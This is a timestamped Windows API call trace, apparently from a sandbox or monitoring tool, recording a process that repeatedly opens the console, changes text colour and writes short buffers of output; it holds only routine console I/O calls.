	[0064.480] GetLastError () returned 0xcb
	[0064.480] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x570ec8c | out: lpConsoleScreenBufferInfo=0x570ec8c) returned 1
	[0064.480] GetLastError () returned 0xcb
	[0064.480] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1
	[0064.480] GetLastError () returned 0xcb
	[0064.480] CloseHandle (hObject=0x23) returned 1
	[0064.480] GetLastError () returned 0xcb
	[0064.483] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0064.483] GetLastError () returned 0xcb
	[0064.483] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x570ec8c | out: lpConsoleScreenBufferInfo=0x570ec8c) returned 1
	[0064.483] GetLastError () returned 0xcb
	[0064.483] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1
	[0064.483] GetLastError () returned 0xcb
	[0064.483] CloseHandle (hObject=0x23) returned 1
	[0064.484] GetLastError () returned 0xcb
	[0064.486] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0064.486] GetLastError () returned 0xcb
	[0064.486] GetConsoleMode (in: hConsoleHandle=0x23, lpMode=0x570ed1c | out: lpMode=0x570ed1c) returned 1
	[0064.486] GetLastError () returned 0xcb
	[0064.486] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x1e79938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x570ed1c, lpReserved=0x0 | out: lpBuffer=0x1e79938*, lpNumberOfCharsWritten=0x570ed1c*=0x1) returned 1
	[0064.486] GetLastError () returned 0xcb
	[0064.486] CloseHandle (hObject=0x23) returned 1
	[0064.487] GetLastError () returned 0xcb
	[0064.489] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0064.489] GetLastError () returned 0xcb
	[0064.489] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x570ece8 | out: lpConsoleScreenBufferInfo=0x570ece8) returned 1
	[0064.489] GetLastError () returned 0xcb
	[0064.489] GetConsoleOutputCP () returned 0x1b5
	[0064.489] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.489] GetLastError () returned 0xcb
	[0064.492] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27
	[0064.492] GetLastError () returned 0xcb
	[0064.492] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x27, lpConsoleScreenBufferInfo=0x570ec88 | out: lpConsoleScreenBufferInfo=0x570ec88) returned 1
	[0064.492] GetLastError () returned 0xcb
	[0064.495] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b
	[0064.495] GetLastError () returned 0xcb
	[0064.495] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2b, lpConsoleScreenBufferInfo=0x570ec88 | out: lpConsoleScreenBufferInfo=0x570ec88) returned 1
	[0064.495] GetLastError () returned 0xcb
	[0064.497] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0064.498] GetLastError () returned 0xcb
	[0064.498] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x570ec90 | out: lpConsoleScreenBufferInfo=0x570ec90) returned 1
	[0064.498] GetLastError () returned 0xcb
	[0064.498] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1
	[0064.498] GetLastError () returned 0xcb
	[0064.498] CloseHandle (hObject=0x2f) returned 1
	[0064.498] GetLastError () returned 0xcb
	[0064.500] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0064.501] GetLastError () returned 0xcb
	[0064.501] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x570ec90 | out: lpConsoleScreenBufferInfo=0x570ec90) returned 1
	[0064.501] GetLastError () returned 0xcb
	[0064.501] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1
	[0064.501] GetLastError () returned 0xcb
	[0064.501] CloseHandle (hObject=0x2f) returned 1
	[0064.501] GetLastError () returned 0xcb
	[0064.503] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0064.504] GetLastError () returned 0xcb
	[0064.504] GetConsoleMode (in: hConsoleHandle=0x2f, lpMode=0x570ecdc | out: lpMode=0x570ecdc) returned 1
	[0064.504] GetLastError () returned 0xcb
	[0064.504] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x2546d60*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x570ecdc, lpReserved=0x0 | out: lpBuffer=0x2546d60*, lpNumberOfCharsWritten=0x570ecdc*=0x4f) returned 1
	[0064.504] GetLastError () returned 0xcb
	[0064.504] CloseHandle (hObject=0x2f) returned 1
	[0064.504] GetLastError () returned 0xcb
	[0064.507] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0064.507] GetLastError () returned 0xcb
	[0064.507] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x570ec8c | out: lpConsoleScreenBufferInfo=0x570ec8c) returned 1
	[0064.507] GetLastError () returned 0xcb
	[0064.507] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1
	[0064.507] GetLastError () returned 0xcb
	[0064.507] CloseHandle (hObject=0x2f) returned 1
	[0064.507] GetLastError () returned 0xcb
	[0064.510] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0064.510] GetLastError () returned 0xcb
	[0064.510] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x570ec8c | out: lpConsoleScreenBufferInfo=0x570ec8c) returned 1
	[0064.510] GetLastError () returned 0xcb
	[0064.510] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1
	[0064.510] GetLastError () returned 0xcb
	[0064.510] CloseHandle (hObject=0x2f) returned 1
	[0064.511] GetLastError () returned 0xcb
	[0064.513] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0064.513] GetLastError () returned 0xcb
	[0064.513] GetConsoleMode (in: hConsoleHandle=0x2f, lpMode=0x570ed1c | out: lpMode=0x570ed1c) returned 1
	[0064.513] GetLastError () returned 0xcb
	[0064.513] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x1e79938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x570ed1c, lpReserved=0x0 | out: lpBuffer=0x1e79938*, lpNumberOfCharsWritten=0x570ed1c*=0x1) returned 1
	[0064.513] GetLastError () returned 0xcb
	[0064.513] CloseHandle (hObject=0x2f) returned 1
	[0064.514] GetLastError () returned 0xcb
	[0064.517] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0064.517] GetLastError () returned 0xcb
	[0064.517] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x570ece8 | out: lpConsoleScreenBufferInfo=0x570ece8) returned 1
	[0064.518] GetLastError () returned 0xcb
	[0064.518] GetConsoleOutputCP () returned 0x1b5
	[0064.518] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.518] GetLastError () returned 0xcb
	[0064.521] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33
	[0064.521] GetLastError () returned 0xcb
	[0064.521] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x33, lpConsoleScreenBufferInfo=0x570ec88 | out: lpConsoleScreenBufferInfo=0x570ec88) returned 1
	[0064.522] GetLastError () returned 0xcb
	[0064.525] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37
	[0064.525] GetLastError () returned 0xcb
	[0064.525] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x37, lpConsoleScreenBufferInfo=0x570ec88 | out: lpConsoleScreenBufferInfo=0x570ec88) returned 1
	[0064.525] GetLastError () returned 0xcb
	[0064.529] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0064.529] GetLastError () returned 0xcb
	[0064.529] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x570ec90 | out: lpConsoleScreenBufferInfo=0x570ec90) returned 1
	[0064.529] GetLastError () returned 0xcb
	[0064.529] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1
	[0064.530] GetLastError () returned 0xcb
	[0064.530] CloseHandle (hObject=0x3b) returned 1
	[0064.530] GetLastError () returned 0xcb
	[0064.533] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0064.534] GetLastError () returned 0xcb
	[0064.534] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x570ec90 | out: lpConsoleScreenBufferInfo=0x570ec90) returned 1
	[0064.534] GetLastError () returned 0xcb
	[0064.534] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1
	[0064.534] GetLastError () returned 0xcb
	[0064.534] CloseHandle (hObject=0x3b) returned 1
	[0064.534] GetLastError () returned 0xcb
	[0064.538] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0064.538] GetLastError () returned 0xcb
	[0064.538] GetConsoleMode (in: hConsoleHandle=0x3b, lpMode=0x570ecdc | out: lpMode=0x570ecdc) returned 1
	[0064.539] GetLastError () returned 0xcb
	[0064.539] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x2547290*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0x570ecdc, lpReserved=0x0 | out: lpBuffer=0x2547290*, lpNumberOfCharsWritten=0x570ecdc*=0x3e) returned 1
	[0064.539] GetLastError () returned 0xcb
	[0064.539] CloseHandle (hObject=0x3b) returned 1
	[0064.539] GetLastError () returned 0xcb
	[0064.542] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0064.542] GetLastError () returned 0xcb
	[0064.542] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x570ec8c | out: lpConsoleScreenBufferInfo=0x570ec8c) returned 1
	[0064.542] GetLastError () returned 0xcb
	[0064.542] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1
	[0064.542] GetLastError () returned 0xcb
	[0064.542] CloseHandle (hObject=0x3b) returned 1
	[0064.542] GetLastError () returned 0xcb
	[0064.545] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0064.545] GetLastError () returned 0xcb
	[0064.545] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x570ec8c | out: lpConsoleScreenBufferInfo=0x570ec8c) returned 1
	[0064.545] GetLastError () returned 0xcb
	[0064.545] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1
	[0064.545] GetLastError () returned 0xcb
	[0064.545] CloseHandle (hObject=0x3b) returned 1
	[0064.546] GetLastError () returned 0xcb
	[0064.548] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0064.549] GetLastError () returned 0xcb
	[0064.549] GetConsoleMode (in: hConsoleHandle=0x3b, lpMode=0x570ed1c | out: lpMode=0x570ed1c) returned 1
	[0064.549] GetLastError () returned 0xcb
	[0064.549] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x1e79938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x570ed1c, lpReserved=0x0 | out: lpBuffer=0x1e79938*, lpNumberOfCharsWritten=0x570ed1c*=0x1) returned 1
	[0064.549] GetLastError () returned 0xcb
	[0064.549] CloseHandle (hObject=0x3b) returned 1
	[0064.549] GetLastError () returned 0xcb
	[0064.552] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0064.552] GetLastError () returned 0xcb
	[0064.552] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x570ece8 | out: lpConsoleScreenBufferInfo=0x570ece8) returned 1
	[0064.552] GetLastError () returned 0xcb
	[0064.552] GetConsoleOutputCP () returned 0x1b5
	[0064.552] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.553] GetLastError () returned 0xcb
	[0064.556] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f
	[0064.556] GetLastError () returned 0xcb
	[0064.556] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3f, lpConsoleScreenBufferInfo=0x570ec88 | out: lpConsoleScreenBufferInfo=0x570ec88) returned 1
	[0064.556] GetLastError () returned 0xcb
	[0064.559] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43
	[0064.559] GetLastError () returned 0xcb
	[0064.559] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x43, lpConsoleScreenBufferInfo=0x570ec88 | out: lpConsoleScreenBufferInfo=0x570ec88) returned 1
	[0064.559] GetLastError () returned 0xcb
	[0064.562] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0064.562] GetLastError () returned 0xcb
	[0064.562] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x570ec90 | out: lpConsoleScreenBufferInfo=0x570ec90) returned 1
	[0064.562] GetLastError () returned 0xcb
	[0064.562] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1
	[0064.563] GetLastError () returned 0xcb
	[0064.563] CloseHandle (hObject=0x47) returned 1
	[0064.563] GetLastError () returned 0xcb
	[0064.566] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0064.566] GetLastError () returned 0xcb
	[0064.566] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x570ec90 | out: lpConsoleScreenBufferInfo=0x570ec90) returned 1
	[0064.566] GetLastError () returned 0xcb
	[0064.566] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1
	[0064.566] GetLastError () returned 0xcb
	[0064.566] CloseHandle (hObject=0x47) returned 1
	[0064.566] GetLastError () returned 0xcb
	[0064.569] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0064.569] GetLastError () returned 0xcb
	[0064.569] GetConsoleMode (in: hConsoleHandle=0x47, lpMode=0x570ecdc | out: lpMode=0x570ecdc) returned 1
	[0064.569] GetLastError () returned 0xcb
	[0064.569] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x25476a8*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x570ecdc, lpReserved=0x0 | out: lpBuffer=0x25476a8*, lpNumberOfCharsWritten=0x570ecdc*=0x11) returned 1
	[0064.570] GetLastError () returned 0xcb
	[0064.570] CloseHandle (hObject=0x47) returned 1
	[0064.570] GetLastError () returned 0xcb
	[0064.573] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0064.573] GetLastError () returned 0xcb
	[0064.573] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x570ec8c | out: lpConsoleScreenBufferInfo=0x570ec8c) returned 1
	[0064.573] GetLastError () returned 0xcb
	[0064.573] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1
	[0064.573] GetLastError () returned 0xcb
	[0064.573] CloseHandle (hObject=0x47) returned 1
	[0064.573] GetLastError () returned 0xcb
	[0064.576] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0064.576] GetLastError () returned 0xcb
	[0064.576] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x570ec8c | out: lpConsoleScreenBufferInfo=0x570ec8c) returned 1
	[0064.577] GetLastError () returned 0xcb
	[0064.577] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1
	[0064.577] GetLastError () returned 0xcb
	[0064.577] CloseHandle (hObject=0x47) returned 1
	[0064.577] GetLastError () returned 0xcb
	[0064.580] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0064.580] GetLastError () returned 0xcb
	[0064.580] GetConsoleMode (in: hConsoleHandle=0x47, lpMode=0x570ed1c | out: lpMode=0x570ed1c) returned 1
	[0064.580] GetLastError () returned 0xcb
	[0064.580] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x1e79938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x570ed1c, lpReserved=0x0 | out: lpBuffer=0x1e79938*, lpNumberOfCharsWritten=0x570ed1c*=0x1) returned 1
	[0064.580] GetLastError () returned 0xcb
	[0064.580] CloseHandle (hObject=0x47) returned 1
	[0064.581] GetLastError () returned 0xcb
	[0064.583] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0064.583] GetLastError () returned 0xcb
	[0064.583] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x570ece8 | out: lpConsoleScreenBufferInfo=0x570ece8) returned 1
	[0064.584] GetLastError () returned 0xcb
	[0064.584] GetConsoleOutputCP () returned 0x1b5
	[0064.584] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.584] GetLastError () returned 0xcb
	[0064.586] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4b
	[0064.586] GetLastError () returned 0xcb
	[0064.586] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4b, lpConsoleScreenBufferInfo=0x570ec88 | out: lpConsoleScreenBufferInfo=0x570ec88) returned 1
	[0064.587] GetLastError () returned 0xcb
	[0064.589] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f
	[0064.589] GetLastError () returned 0xcb
	[0064.589] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4f, lpConsoleScreenBufferInfo=0x570ec88 | out: lpConsoleScreenBufferInfo=0x570ec88) returned 1
	[0064.589] GetLastError () returned 0xcb
	[0064.592] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0064.592] GetLastError () returned 0xcb
	[0064.592] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x570ec90 | out: lpConsoleScreenBufferInfo=0x570ec90) returned 1
	[0064.592] GetLastError () returned 0xcb
	[0064.592] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1
	[0064.592] GetLastError () returned 0xcb
	[0064.592] CloseHandle (hObject=0x53) returned 1
	[0064.593] GetLastError () returned 0xcb
	[0064.595] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0064.595] GetLastError () returned 0xcb
	[0064.595] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x570ec90 | out: lpConsoleScreenBufferInfo=0x570ec90) returned 1
	[0064.595] GetLastError () returned 0xcb
	[0064.595] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1
	[0064.595] GetLastError () returned 0xcb
	[0064.595] CloseHandle (hObject=0x53) returned 1
	[0064.596] GetLastError () returned 0xcb
	[0064.598] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0064.598] GetLastError () returned 0xcb
	[0064.598] GetConsoleMode (in: hConsoleHandle=0x53, lpMode=0x570ecdc | out: lpMode=0x570ecdc) returned 1
	[0064.598] GetLastError () returned 0xcb
	[0064.598] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x2547a20*, nNumberOfCharsToWrite=0x39, lpNumberOfCharsWritten=0x570ecdc, lpReserved=0x0 | out: lpBuffer=0x2547a20*, lpNumberOfCharsWritten=0x570ecdc*=0x39) returned 1
	[0064.599] GetLastError () returned 0xcb
	[0064.599] CloseHandle (hObject=0x53) returned 1
	[0064.599] GetLastError () returned 0xcb
	[0064.601] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0064.602] GetLastError () returned 0xcb
	[0064.602] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x570ec8c | out: lpConsoleScreenBufferInfo=0x570ec8c) returned 1
	[0064.602] GetLastError () returned 0xcb
	[0064.602] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1
	[0064.602] GetLastError () returned 0xcb
	[0064.602] CloseHandle (hObject=0x53) returned 1
	[0064.602] GetLastError () returned 0xcb
	[0064.605] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0064.605] GetLastError () returned 0xcb
	[0064.605] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x570ec8c | out: lpConsoleScreenBufferInfo=0x570ec8c) returned 1
	[0064.605] GetLastError () returned 0xcb
	[0064.605] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1
	[0064.605] GetLastError () returned 0xcb
	[0064.605] CloseHandle (hObject=0x53) returned 1
	[0064.605] GetLastError () returned 0xcb
	[0064.608] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0064.608] GetLastError () returned 0xcb
	[0064.608] GetConsoleMode (in: hConsoleHandle=0x53, lpMode=0x570ed1c | out: lpMode=0x570ed1c) returned 1
	[0064.608] GetLastError () returned 0xcb
	[0064.608] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x1e79938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x570ed1c, lpReserved=0x0 | out: lpBuffer=0x1e79938*, lpNumberOfCharsWritten=0x570ed1c*=0x1) returned 1
	[0064.608] GetLastError () returned 0xcb
	[0064.608] CloseHandle (hObject=0x53) returned 1
	[0064.609] GetLastError () returned 0xcb
	[0064.611] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0064.611] GetLastError () returned 0xcb
	[0064.611] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x570ece8 | out: lpConsoleScreenBufferInfo=0x570ece8) returned 1
	[0064.611] GetLastError () returned 0xcb
	[0064.611] GetConsoleOutputCP () returned 0x1b5
	[0064.611] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
